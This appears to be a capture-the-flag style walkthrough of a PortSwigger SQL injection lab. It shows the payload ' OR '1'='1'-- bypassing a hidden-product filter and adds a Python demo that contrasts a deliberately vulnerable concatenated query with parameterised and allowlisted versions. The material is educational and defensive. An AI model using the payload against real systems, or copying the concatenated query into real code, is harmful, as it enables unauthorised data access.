SQL injection vulnerability in WHERE clause allowing retrieval of hidden data
https://portswigger.net/web-security/sql-injection/lab-retrieve-hidden-data

Let's filter by Accessories.

The resultant SQL query is:

```sql
SELECT * FROM products WHERE category = 'Accessories' AND released = 1
```

Since we are proxying the traffic through Burp Suite, we can access this request in the Proxy > HTTP History tab.

Let's forward this request to the Repeater for further modification. Once in the Repeater, we can set the category filter to the following:

```
' OR '1'='1'--
```

The resultant SQL query will be:

```sql
SELECT * FROM products WHERE category = '' OR '1' = '1'--' AND released = 1
```

## Queried part:

```sql
SELECT * FROM products WHERE category = '' OR '1' = '1'
```

## Commented part:

```sql
' AND released = 1
```

Since `'1' = '1'` is always true, the WHERE clause matches every row, so the server returns products from all categories. And since the `AND released = 1` part is commented out, even the unreleased products are returned.
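The root cause is that the category value is spliced into the SQL text, so it can change the query's grammar. The script below is an added example (not PortSwigger's lab code): it builds a constructed in-memory SQLite `products` table, runs the write-up's query once by string concatenation and once with a bound parameter, and adds a hypothetical category allowlist as a second layer. The table contents, the `KNOWN_CATEGORIES` set and the function names are all assumptions made for the demonstration.

```python
import sqlite3

# Constructed sample catalogue (assumption: not the lab's real data). Each category
# has one released and one unreleased product, so hidden rows are easy to spot.
SAMPLE_PRODUCTS = [
    ("Gifts", "Gift card", 1),
    ("Gifts", "Unreleased gift", 0),
    ("Accessories", "Belt", 1),
    ("Accessories", "Unreleased hat", 0),
]

# Hypothetical allowlist of the categories the shop actually offers in its menu.
KNOWN_CATEGORIES = frozenset({"Gifts", "Accessories"})


def build_db():
    """In-memory SQLite database holding the constructed products table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (category TEXT, name TEXT, released INTEGER)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)", SAMPLE_PRODUCTS)
    return conn


def vulnerable_query(conn, category):
    """The write-up's query, built by string concatenation.

    The user-supplied category becomes part of the SQL text, so a quote can close
    the string literal and '--' can comment out the released = 1 condition.
    """
    sql = f"SELECT name FROM products WHERE category = '{category}' AND released = 1"
    return [row[0] for row in conn.execute(sql)]


def safe_query(conn, category):
    """Same query with a bound parameter.

    The value travels separately from the SQL text, so quotes and comment markers
    inside it are treated as data, never as syntax.
    """
    sql = "SELECT name FROM products WHERE category = ? AND released = 1"
    return [row[0] for row in conn.execute(sql, (category,))]


def allowlisted_query(conn, category):
    """Defence in depth: refuse any category the application does not offer,
    before the value reaches the database at all."""
    if category not in KNOWN_CATEGORIES:
        raise ValueError(f"unknown category: {category!r}")
    return safe_query(conn, category)


if __name__ == "__main__":
    db = build_db()
    payload = "' OR '1'='1'--"
    print("concatenated, normal input :", vulnerable_query(db, "Accessories"))
    print("concatenated, payload      :", vulnerable_query(db, payload))
    print("parameterised, payload     :", safe_query(db, payload))
```

With the concatenated query the payload returns every row, released or not; with the bound parameter the same input is compared literally against the `category` column and matches nothing. The allowlist is independent of the database driver, so it still holds if a later change reintroduces string building somewhere else.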

We have solved the lab.
